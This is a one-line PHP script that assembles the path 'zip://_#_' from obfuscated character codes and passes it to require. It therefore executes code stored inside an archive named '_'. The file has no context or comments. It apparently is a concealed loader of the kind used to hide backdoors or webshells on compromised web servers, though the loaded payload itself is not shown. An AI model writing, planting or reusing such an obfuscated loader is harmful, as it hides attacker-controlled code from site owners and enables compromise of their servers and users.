<?php $df = array(122, 105, 112, 58, 47, 47, 95, 35, 95); $qyj = ''; for($i=0;$i<count($df);$i++) { $qyj .= chr($df[$i]); } require $qyj; ?>